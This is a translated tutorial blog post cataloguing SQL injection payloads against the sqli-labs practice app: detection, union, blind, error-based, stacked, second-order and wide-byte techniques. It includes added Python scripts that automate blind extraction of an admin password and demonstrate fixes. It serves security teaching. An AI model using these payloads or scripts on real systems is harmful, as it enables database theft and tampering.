[network security] SQL injection syntax summary
2022-07-07 14:04:00 【Penguin jumping stairs】
Catalog
I. Principle
II. SQL injection detection methods
  1. String (character) type detection
  2. Numeric type detection
  3. Search-type and other detection
III. Union injection
  1. order by and error-based injection
  2. union joint query
IV. Blind injection
  1. Boolean blind injection
  2. Time-based blind injection
V. Error-based injection
VI. Stacked injection
VII. Second-order injection
VIII. Wide byte injection
IX. dnslog injection
X. SQL injection to write a webshell
XI. Summary
I. Principle
So-called SQL injection means inserting SQL commands into a web form submission, an input field, or the query string of a page request, so that the server is tricked into executing malicious SQL commands.
SQL syntax allows database commands to be mixed with user data. If the developer is careless, user data may be interpreted as commands. In that case a remote user can not only enter data into the web application but also execute arbitrary commands on the database, limited only by the privileges of the account the application connects with.
II. SQL injection detection methods
1. String (character) type detection
To test whether a URL parameter is injectable as a string, append a single quotation mark to the value in the URL:
url: http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
The page shows an error, roughly meaning that there is a SQL syntax error. Appending %23 after the quote (the URL-encoded form of #, which starts a MySQL comment) makes the page display normally again, because the comment swallows the dangling quote of the original query. Note that a literal # typed into the browser address bar is the URL fragment delimiter and is never sent to the server, which is why %23 is used.
When we append and 1=1 after the single quote (followed by the comment), the page displays normally:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=1#
When we change 1=1 to 1=2, the page errors or comes back empty:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2#
2. Numeric type detection
Enter and 1=1 directly, without a quote:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1
If the page displays normally, go one step further and test 1=2:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2
If the page changes, we can conclude that it is a numeric injection, because a numeric parameter is placed into the query without quotation marks, just like an int.
3. Search-type and other detection
These are variants of string type detection; the only difference is that the closing construction (quote, parenthesis, wildcard) has to be chosen according to the error message that comes back. In a search box the value usually sits inside like '%...%', so the payload has to close both the percent sign and the quote, for example %' and 1=1%23.
III. Union injection
1. order by and error-based injection
order by N is used first to find how many columns the original query returns (increase N until the page errors; the last N that works is the column count), because a union select must supply the same number of columns. The example below combines it with an updatexml() error that leaks the number of databases:
select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
2. union joint query
?id=111' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='Database name') --+
The id value 111 is chosen so that the original query returns no row; the union row is then the one displayed, and whichever of the positions 1, 2, 3 is echoed on the page can carry the subquery result.
IV. Blind injection
In the payloads below, %23 is the URL-encoded # and --+ is -- followed by a space; both start a MySQL comment that discards the rest of the original query. 'Database name', 'Table name' and 'Field name' are placeholders for values recovered in the earlier steps.
1. Boolean blind injection
Each request yields one bit (page normal or not), so values are recovered by comparison, one character at a time.
(1) Query the length of the current database name
and (length(database()))>8%23
(2) Query the current database name, one character at a time, by its ASCII code
and (ascii(substr(database(),1,1)))<120 %23
(3) Query the number of tables in the database
and (select count(*) from information_schema.tables where table_schema='Database name')>4 %23
(4) Query the length of the first table name in the database
and (length((select table_name from information_schema.tables where table_schema='Database name' limit 0,1)))=6%23
(5) Query the first character of the first table name
and (ascii(substr((select table_name from information_schema.tables where table_schema='Database name' limit 0,1),1,1))>100)%23
(6) Query the length of the first column name in the table
and (length((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1)))=2%23
(7) Query the first character of the first column name (105 is the ASCII code of 'i')
and (ascii(substr((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1),1,1)))=105 %23
(8) Query the first character of the first row of data in that column
and (ascii(substr((select Field name from Table name limit 0,1),1,1)))=68 %23
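The detection steps of section II and the boolean blind payloads above, automated as an added Python example that is not part of the original post. It simulates the Less-1 style page with an in-memory SQLite database (an assumption: SQLite's sqlite_master, unicode() and -- stand in for MySQL's information_schema, ascii() and #), and recovers each value with a binary search over '>' comparisons instead of the one-guess-per-request equality tests the payload list implies. The users table and its rows are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the vulnerable application (assumption: SQLite
# in-memory instead of MySQL; sqlite_master plays the role of
# information_schema, unicode() the role of ascii(), and "--" the role of #).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you'),
                         (3, 'admin', 's3cret');
""")

oracle_calls = 0  # number of requests the attacker had to send


def vulnerable_page(id_value: str) -> bool:
    """Models Less-1 style code: ?id= is pasted into a quoted string.

    Returns True when a row is rendered (the "normal" page) and False when the
    query errors or returns nothing (the "error"/empty page). That single bit
    is all a boolean-blind attacker can observe.
    """
    global oracle_calls
    oracle_calls += 1
    sql = f"SELECT username, password FROM users WHERE id='{id_value}' LIMIT 1"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def detect_injection() -> dict:
    """Section II, string type: a bare quote breaks the query, a commented
    true condition restores the page, a false condition changes it."""
    return {
        "quote_breaks_query": not vulnerable_page("1'"),
        "true_condition_ok": vulnerable_page("1' AND 1=1 -- "),
        "false_condition_differs": not vulnerable_page("1' AND 1=2 -- "),
    }


def oracle(condition: str) -> bool:
    """True iff the injected condition holds for the row id=1."""
    return vulnerable_page(f"1' AND ({condition}) -- ")


def extract_int(expr: str, lo: int = 0, hi: int = 255) -> int:
    """Binary-search the integer value of a scalar SQL expression using only
    '>' comparisons: about 8 requests instead of up to 256 equality guesses."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(subquery: str) -> str:
    """Recover a string returned by a scalar subquery: first its length, then
    each printable character via unicode(substr(...)) (MySQL: ascii(substr(...)))."""
    length = extract_int(f"length(({subquery}))", 0, 255)
    return "".join(
        chr(extract_int(f"unicode(substr(({subquery}), {pos}, 1))", 32, 126))
        for pos in range(1, length + 1)
    )


def requests_used() -> int:
    return oracle_calls


if __name__ == "__main__":
    print(detect_injection())
    print("first table:", extract_string(
        "SELECT name FROM sqlite_master WHERE type='table' LIMIT 0,1"))
    print("admin password:", extract_string(
        "SELECT password FROM users WHERE username='admin'"))
    print("requests used:", requests_used())
```

The time-based variant of section IV.2 changes only vulnerable_page(): instead of looking at whether a row came back, it measures the response time of an if(cond, sleep(5), 1) payload against a threshold; oracle(), extract_int() and extract_string() stay exactly the same.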
2. Time-based blind injection
When the page looks the same for true and false conditions, wrap the test in if() with sleep(): the response delay is the bit. Because the condition is evaluated for every row the where clause examines, the delay can be a multiple of the sleep time on larger tables; pick a value safely above network jitter.
(1) Check whether the delay function works
and sleep(5) %23
(2) Query the length of the current database; if the guess is correct the response is delayed 5 seconds
and if((length(database()))>7,sleep(5),1) --+
(3) Check whether the first character of the current database name is a
and if((substr(database(),1,1)='a'),sleep(5),1) %23
(4) Check whether the ASCII code of the first character of the current database name is 100
and if((ascii(substr(database(),1,1))=100),sleep(5),1) %23
(5) Query the number of tables
and if((select count(*) from information_schema.tables where table_schema='Database name')=4,sleep(5),1)%23
(6) Query the length of a table name (here the fourth table, limit 3,1)
and if((select length((select table_name from information_schema.tables where table_schema='Database name' limit 3,1))=5),sleep(5),1)%23
(7) Query the first character of that table name (117 is the ASCII code of 'u')
and if((select ascii(substr((select table_name from information_schema.tables where table_schema='Database name' limit 3,1),1,1)))=117,sleep(5),1)%23
(8) Query the number of columns in a table (here users)
and if(((select count(*) from information_schema.columns where table_schema='Database name' and table_name='users')=3),sleep(5),1)%23
(9) Query the length of a column name
and if((select length((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1))=2),sleep(5),1)%23
(10) Query the first character of that column name
and if((select ascii(substr((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1),1,1)))=105,sleep(5),1)%23
(11) Query the length of the first value in the id column
and if((select length((select id from Table name limit 0,1)))=1,sleep(5),1)%23
(12) Query the first character of that value (49 is the ASCII code of '1')
and if((select ascii(substr((select id from Table name limit 0,1),1,1)))=49,sleep(5),1)%23
V. Error-based injection
The leaked value is carried back inside the database error message, so the page must display SQL errors. The examples leak database(); any scalar subquery can take its place.
(1) floor()
and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
Grouping by a key built from rand() makes MySQL fail with "Duplicate entry '...' for key 'group_key'", and the duplicate key text contains the value. The table in the inner from needs at least three rows, which information_schema.tables always has.
(2) extractvalue()
select * from users where id=1 and (extractvalue(1,concat(0x7e,(select database()),0x7e)));
(3) updatexml()
select * from users where id=1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1));
0x7e is ~, which is illegal in XPath, so the "XPATH syntax error" message echoes the string following it. Both functions exist since MySQL 5.1.5, and the message is truncated to 32 characters, so longer values have to be paged with substr().
(4) geometrycollection()
select * from users where id=1 and geometrycollection((select * from(select * from(select database())a)b));
(5) multipoint()
select * from users where id=1 and multipoint((select * from(select * from(select database())a)b));
(6) polygon()
select * from users where id=1 and polygon((select * from(select * from(select database())a)b));
(7) multipolygon()
select * from users where id=1 and multipolygon((select * from(select * from(select database())a)b));
(8) linestring()
select * from users where id=1 and linestring((select * from(select * from(select database())a)b));
(9) multilinestring()
select * from users where id=1 and multilinestring((select * from(select * from(select database())a)b));
(10) exp()
select * from users where id=1 and exp(~(select * from(select database())a));
The geometry functions (4) to (9) and the exp() overflow (10) only leak on older MySQL 5.x releases; those bugs have since been fixed, so on current servers try (1) to (3) first.
VI. Stacked injection
Principle: mysqli_multi_query() supports executing several SQL statements in one call, separated by ; , so injected input can append whole additional statements that are executed one after another.
For example
select * from users;show databases;
Both statements above run in one call, so with sufficient privileges an attacker can insert, delete, update and query, not just read.
Although this injection technique is very powerful, it is rare in practice. It may be limited by the API or the database engine, or by permissions: the application has to call the database through a function that runs several statements, such as mysqli_multi_query(). In reality, to limit the impact of SQL injection, PHP code usually calls mysqli_query(), which executes only one statement and ignores everything after the semicolon. The conditions for stacked injection are therefore very restrictive, but once it is usable it poses a great threat to the site.
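The single-statement versus multi-statement API difference described above, as an added Python example that is not part of the original post. It uses Python's sqlite3 module as a stand-in for PHP's mysqli (an assumption): Connection.execute() behaves like mysqli_query() and refuses a second statement, while Connection.executescript() behaves like mysqli_multi_query() and runs everything. The table and the stacked payload are constructed for the example.

```python
import sqlite3

# Constructed stacked payload: a numeric id followed by a second statement.
STACKED_PAYLOAD = "1; DROP TABLE users"


def fresh_db() -> sqlite3.Connection:
    """Constructed sample schema for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin')")
    return conn


def users_table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='users'"
    ).fetchone()
    return row[0] == 1


def query_single_statement(conn: sqlite3.Connection, user_input: str) -> str:
    """Analogue of mysqli_query(): the driver executes exactly one statement.
    sqlite3's execute() refuses the trailing statement (it raises Warning or
    ProgrammingError depending on the Python version), so the DROP never
    runs. The injection is still present; it just cannot stack."""
    sql = f"SELECT username FROM users WHERE id={user_input}"
    try:
        conn.execute(sql).fetchall()
        return "executed"
    except (sqlite3.Warning, sqlite3.Error) as exc:
        return f"rejected: {exc}"


def query_multi_statement(conn: sqlite3.Connection, user_input: str) -> str:
    """Analogue of mysqli_multi_query(): everything after ';' also executes."""
    sql = f"SELECT username FROM users WHERE id={user_input}"
    conn.executescript(sql)
    return "executed"


def query_parameterized(conn: sqlite3.Connection, user_input) -> list:
    """The fix: bind the value. The payload is compared as data and is never
    parsed as SQL, whichever API the driver offers."""
    return conn.execute(
        "SELECT username FROM users WHERE id=?", (user_input,)
    ).fetchall()


if __name__ == "__main__":
    for fn in (query_single_statement, query_multi_statement):
        db = fresh_db()
        print(fn.__name__, fn(db, STACKED_PAYLOAD), "table survives:",
              users_table_exists(db))
```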
VII. Second-order injection
Second-order injection can be summarized as the following two steps:
(1) Inserting the malicious data
When the data is first written to the database, special characters are escaped for that insert (for example with addslashes() or a prepared statement), but what ends up stored is the original, unescaped data.
(2) Referencing the malicious data
The application then treats data already stored in the database as safe by default: when a later query is built, the malicious value is read straight back out of the database and concatenated into the new statement without being escaped or checked again.
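The two steps above played out end to end, as an added Python example that is not part of the original post. It uses an in-memory SQLite database (an assumption) with a constructed users table: registration stores the attacker's username safely through a bound parameter, and a later password-change routine reads the stored name back and trusts it, so the attacker resets the real admin's password. The fixed variant binds the second query as well.

```python
import sqlite3

# Constructed attacker account name: the quote closes the string and the
# comment discards the rest of the WHERE clause when it is reused unescaped.
ATTACKER_NAME = "admin' -- "


def fresh_db() -> sqlite3.Connection:
    """Constructed sample schema: one existing admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin-secret')")
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    """Step 1: the registration insert is parameterized, so the malicious
    username is stored exactly as typed and is harmless at this point."""
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn: sqlite3.Connection,
                               username: str, new_password: str) -> int:
    """Step 2: the username is read back from the database and, because it
    'came from the database', concatenated into a new query unescaped.
    Returns the number of rows updated."""
    stored = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchone()[0]
    sql = f"UPDATE users SET password = '{new_password}' WHERE username = '{stored}'"
    return conn.execute(sql).rowcount


def change_password_fixed(conn: sqlite3.Connection,
                          username: str, new_password: str) -> int:
    """Same flow with the second query parameterized: stored data is treated
    as data regardless of where it came from."""
    stored = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchone()[0]
    return conn.execute(
        "UPDATE users SET password = ? WHERE username = ?", (new_password, stored)
    ).rowcount


def password_of(conn: sqlite3.Connection, username: str) -> str:
    return conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()[0]


if __name__ == "__main__":
    db = fresh_db()
    register(db, ATTACKER_NAME, "attacker-pw")
    change_password_vulnerable(db, ATTACKER_NAME, "pwned")
    print("admin password is now:", password_of(db, "admin"))
```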
VIII. Wide byte injection
(1) Principle
When a parameter such as id=1' is passed, the single quote is treated as an illegal character and the filter function prefixes it with a backslash "\", so it can no longer close the string. For the program to accept a parameter containing a single quote, that escape character "\" has to be neutralised. How? The HTTP request is URL-encoded, and if we place %81 in front of the single quote, the server decodes it to the byte 0x81 and the filter then turns the quote into the byte sequence 81 5C 27. When the database reads these bytes under GBK, 0x81 is a valid lead byte and 0x5C ("\") is a valid trail byte, so 81 5C is decoded as one Chinese character and the "\" is consumed; what remains is a bare single quote. (The %df lead byte seen in most write-ups works the same way.)
(2) Conditions
Ⅰ: The database connection uses the GBK character set
Ⅱ: The escaping is done with addslashes(), mysql_real_escape_string(), mysql_escape_string() or similar functions that work byte by byte without knowing the connection charset (mysql_real_escape_string() is only charset-aware when the charset was set with mysqli_set_charset(), not with a SET NAMES query)
The fix is to set the connection charset through mysqli_set_charset() before escaping, or better, to use prepared statements so the value is never spliced into the statement text.
IX. dnslog injection
Data is exfiltrated through DNS lookups: the payload makes the database server resolve a hostname that contains the leaked value, typically by calling load_file() on a UNC path of the form \\<value>.<attacker's dnslog domain>\file, and the attacker reads the value from the DNS log of a domain they control. Because the UNC path is resolved as a network share, this works for MySQL on Windows, not on Linux. It relies on file access, so:
(1) Conditions
secure_file_priv in my.ini (my.cnf on Linux) must be empty
●secure_file_priv = NULL: import and export are disabled entirely
●secure_file_priv = /tmp: import and export are allowed only inside the /tmp directory
●secure_file_priv = "" (empty): import and export are allowed without restriction
X. SQL injection to write a webshell
(1) Conditions
Ⅰ: The database account the injected query runs as must have DBA-level privileges (sqlmap reports --is-dba true); concretely, select ... into outfile requires the FILE privilege, and the MySQL server process itself must be able to write to the target directory
Ⅱ: The absolute path of the web root must be known
Ⅲ: secure_file_priv="" in my.ini, i.e. the option must be empty
XI. Summary
This is information I collected over a long time; I hope all my technical friends can read it through to the end.